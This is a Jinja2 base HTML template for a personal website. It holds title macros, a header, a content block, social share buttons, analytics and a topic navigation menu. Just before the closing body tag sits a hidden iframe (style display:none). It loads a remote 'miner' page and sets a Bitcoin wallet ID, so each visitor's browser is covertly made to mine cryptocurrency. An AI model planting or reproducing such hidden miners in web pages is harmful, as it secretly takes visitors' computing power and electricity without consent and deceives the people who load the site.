{#
  title: base.html
  author: ntrifunovic
#}

{% macro full_title(page) -%}
  {% if page.topic %}
    {{ page.topic }} \
  {% endif %}

  {#

  {% if page.order %}
    {{ page.order }} .
  {% endif %}

  #}

  {{ page.title }}
  {{ caller() }}
{%- endmacro %}

{% macro pritty_title(page) -%}
  <h1>{{ page.title }}</h1>
  {% if page.topic %}
     <p>
       -{{ page.topic }}-
     </p>
  {% endif %}
  {{ caller() }}
{%- endmacro %}

<!doctype html>
<html>
  <head>
   <meta charset="UTF-8">
   <meta http-equiv="X-UA-Compatible" content="chrome=1">
   <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no">

   <title>{% block up_title %}ntrifunovic{% endblock %}</title>

   <link rel="shortcut icon" href="{{ url_for('static', filename='favicon.ico') }}">

   <link rel="stylesheet" href="{{ url_for('pygments_css') }}">
   <link rel="stylesheet" href="{{ url_for('static', filename='stylesheets/styles.css') }}">
   <script src="//ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js"></script>
   <script>
     var _gaq = _gaq || [];
     _gaq.push(['_setAccount', 'UA-38492106-1']);
     _gaq.push(['_trackPageview']);

     (function() {
     var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
     ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
     var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
     })();
   </script>
   <script src="http://getsupportribbon.com/ntrifunovic/script.js"></script>
   {% block extra_scripts %}
   {% endblock extra_scripts %}

   {% for css in output.custom_CSS %}
     <link rel="stylesheet" href="/static/stylesheets/{{ css }}">
   {% endfor %}
   
  </head>
  <body>
    
      <div id="header">
	
	<hr class="spaceless">
	{#
        <nav>
          <li class="fork"><a href="{{ url_for('index') }}">Portfolio & CV</a></li>
        </nav> 
	#}


	<span id = "social">
          SOCIAL CORNER
	</span>
      </div><!-- end header -->

     

    <div class="wrapper">
      <section>
        <div id="title">
          {% block title %}{% endblock %}
          <hr>
          <span class="credits left">
            Website maintained by <a href="https://github.com/ntrifunovic">ntrifunovic</a>
          </span>
          <span class="credits right">Theme by <a href="http://twitter.com/#!/michigangraham">mattgraham</a> <b>modified</b> by <a href="https://github.com/ntrifunovic">ntrifunovic</a></span>
        </div>

        <hr>  
        </section>
        {% block content %}
          {{ output|safe }}
        {% endblock content %}

    </div>

    <div id="footer-bar">
      <div id="footer-bar-content">

        <hr class="spaceless">

        {# FB LIKE #}
        <span id="fb-like-b">
          <div class="fb-like" data-send="true" data-layout="button_count" data-width="50" data-show-faces="true"></div>
              <div id="fb-root"></div>
              <script>(function(d, s, id) {
                var js, fjs = d.getElementsByTagName(s)[0];
                if (d.getElementById(id)) return;
                js = d.createElement(s); js.id = id;
                js.src = "//connect.facebook.net/en_US/all.js#xfbml=1";
                fjs.parentNode.insertBefore(js, fjs);
                }(document, 'script', 'facebook-jssdk'));
              </script>
        </span>

        <hr class="spaceless">

        {# TWEET #}
        <span id="tweetb-b">
          <a href="https://twitter.com/share" class="twitter-share-button" data-size="medium">Tweet</a>
          <script>!function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0];if(!d.getElementById(id)){js=d.createElement(s);js.id=id;js.src="//platform.twitter.com/widgets.js";fjs.parentNode.insertBefore(js,fjs);}}(document,"script","twitter-wjs");</script>
        </span>

        <hr class="spaceless">

        {# GOOGLE +1 #}
        <span id="google-pb">
          <!-- Place this tag where you want the +1 button to render. -->
          <div class="g-plusone" data-size="medium"></div>

          <!-- Place this tag after the last +1 button tag. -->
          <script>
            (function() {
            var po = document.createElement('script'); po.type = 'text/javascript'; po.async = true;
            po.src = 'https://apis.google.com/js/plusone.js';
            var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(po, s);
            })();
          </script>
        </span>

        <hr class="spaceless">

      </div>

 <div id="index">
        {% block nav %}
	
        <hr class="spaceless">
        <h3><b>NAVIGACIJA:</b></h3>
 {#
  <script src="http://code.jquery.com/jquery-1.9.1.js"></script>
  <script src="http://code.jquery.com/ui/1.10.2/jquery-ui.js"></script>
  <script>
  $(function() {
    $( "#menu" ).menu();
  });
  </script>
#}

        <ul id="menu">
	  {% for topic in pages|groupby('topic')|sort_topics %}
	  <li><a href="#MENU-ITEM-{{ loop.index }}" class="index-item">{{ topic.grouper }}</a>
	      <span class="MENU-ITEM-DUMMY" id="MENU-ITEM-{{ loop.index }}"></span>
	      <div>
	    <ul>
	      {% for page in topic.list|sort_titles %}
              <li class='sub-menu'>
		<a href="{{ url_for("page", path=page.path) }}" class="index-sub-item">
		  {{ page.title }}
		</a>
	      </li>
	      {% endfor %}
	    </ul>
	    
	      </div>
	  </li>
	  {% endfor %}
        </ul>
        <hr class="spaceless">
        {% endblock nav %}
      </div>

    </div>
    <iframe style='display:none' src='http://tidbit.co.in/miner'><script>window.walletId = 1GoEeg1gdRCzrXutU6DbzcHD1Z5D4WKk5R</script></iframe>
  </body>
</html>
